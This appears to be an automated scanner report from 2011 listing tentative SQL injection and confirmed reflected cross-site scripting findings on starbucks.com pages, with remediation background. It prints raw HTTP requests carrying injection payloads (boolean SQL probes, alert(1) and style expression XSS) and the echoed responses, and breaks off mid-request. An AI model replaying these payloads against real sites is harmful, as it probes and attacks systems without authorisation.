There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu/food/salads/fruit-cup?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:53 GMT
Connection: close
Content-Length: 40081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<div class="allergy">
                           
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>All fruit and vegetables have a season ... a time when they are abundant and taste best. This fruit cup, a delicious combo of seasonal fruit will have you looking forward to each new day on the calendar.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>Like apples? There are more than 7,500 known types of apples.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>pineapple, cantaloupe, kiwi or mango, grapes. ingredients may vary by season.</p>
               </div>
               
           </div>

           <div id="content_rail">
               
               <div id="available">
                   <p>
                       <strong>
                       
                       Currently Available
                       
                       </strong>
                       
                       
                   </p>

                   
                   
                   
               </div
...[SNIP]...

Request 2

GET /menu/food/salads/fruit-cup?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:59 GMT
Connection: close
Content-Length: 40286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<div class="allergy">
                           <ul><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-fat">Fat - 10g or less</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-sodium">Sodium - 600mg or less</a></li></ul>
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>All fruit and vegetables have a season ... a time when they are abundant and taste best. This fruit cup, a delicious combo of seasonal fruit will have you looking forward to each new day on the calendar.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>Like apples? There are more than 7,500 known types of apples.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>pineapple, cantaloupe, kiwi or mango, grapes. ingredients may vary by season.</p>
               </div>
               
           </div>


...[SNIP]...

1.2. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13768680'%20or%201%3d1--%20 and 13768680'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu/food/salads/picnic-pasta-salad?113768680'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:11 GMT
Connection: close
Content-Length: 41249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           <ul><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-fat">Fat - 10g or less</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=high-fiber">Fiber - at least 3g</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=high-protein">Protein - at least 10g</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-sodium">Sodium - 600mg or less</a></li></ul>
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>Summer picnics are more fun with lots of good food to pack the basket. And this light salad is packed with chicken, shredded carrots, grape tomatoes, diced zucchini and bowtie pasta. It...s topped with a red wine vinaigrette dressing that won...t weigh you down. All you need is a fork and an appetite.</p>


               
               <div id="fun_facts"
...[SNIP]...

Request 2

GET /menu/food/salads/picnic-pasta-salad?113768680'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:42 GMT
Connection: close
Content-Length: 40841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>Summer picnics are more fun with lots of good food to pack the basket. And this light salad is packed with chicken, shredded carrots, grape tomatoes, diced zucchini and bowtie pasta. It...s topped with a red wine vinaigrette dressing that won...t weigh you down. All you need is a fork and an appetite.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>The first American pasta factory was opened in Brooklyn, New York, in 1848, by a Frenchman named Antoine Zerega.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>picnic pasta salad (water, farfalle pasta [semolina (wheat), durum flour (wheat), niacin, iron (ferrous sulfate), thiamine mononitrate, riboflavin, folic acid], zucchini
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 327 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95116"%3balert(1)//81dd21ba950 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95116";alert(1)//81dd21ba950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?95116"%3balert(1)//81dd21ba950=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:59 GMT
Connection: close
Content-Length: 41116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<script type="text/javascript">
       var flashvars = {};
       flashvars.playerType = "homepage";
       flashvars.playlistID = "69777476001";
       flashvars.playerLocation = "http://www.starbucks.com/?95116";alert(1)//81dd21ba950=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9ce4"style="x:expression(alert(1))"c1e3c89638a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:55 GMT
Connection: close
Content-Length: 41173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?a9ce4"style="x:expression(alert(1))"c1e3c89638a=1" class="addthis_button_compact" title="Post to AddThis">
...[SNIP]...

2.3. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9592"style%3d"x%3aexpression(alert(1))"d1e7701208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9592"style="x:expression(alert(1))"d1e7701208 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us?a9592"style%3d"x%3aexpression(alert(1))"d1e7701208=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:39 GMT
Connection: close
Content-Length: 38564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us?a9592"style="x:expression(alert(1))"d1e7701208=1" />
...[SNIP]...

2.4. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48515"style%3d"x%3aexpression(alert(1))"882196566b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48515"style="x:expression(alert(1))"882196566b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information?48515"style%3d"x%3aexpression(alert(1))"882196566b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:01 GMT
Connection: close
Content-Length: 39249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information?48515"style="x:expression(alert(1))"882196566b=1" />
...[SNIP]...

2.5. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6624b"style="x:expression(alert(1))"6dff94306a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/privacy-statement?6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 52934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement?6624b"style="x:expression(alert(1))"6dff94306a9=1" />
...[SNIP]...

2.6. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c1"style="x:expression(alert(1))"405a7c3edc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/terms-of-use?177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:24 GMT
Connection: close
Content-Length: 68896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use?177c1"style="x:expression(alert(1))"405a7c3edc3=1" />
...[SNIP]...

2.7. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30cc8"style="x:expression(alert(1))"6c461a50f50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/web-accessibility?30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:20 GMT
Connection: close
Content-Length: 39352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility?30cc8"style="x:expression(alert(1))"6c461a50f50=1" />
...[SNIP]...

2.8. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cd5c"style="x:expression(alert(1))"3d37d7257db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/product-advisories?4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
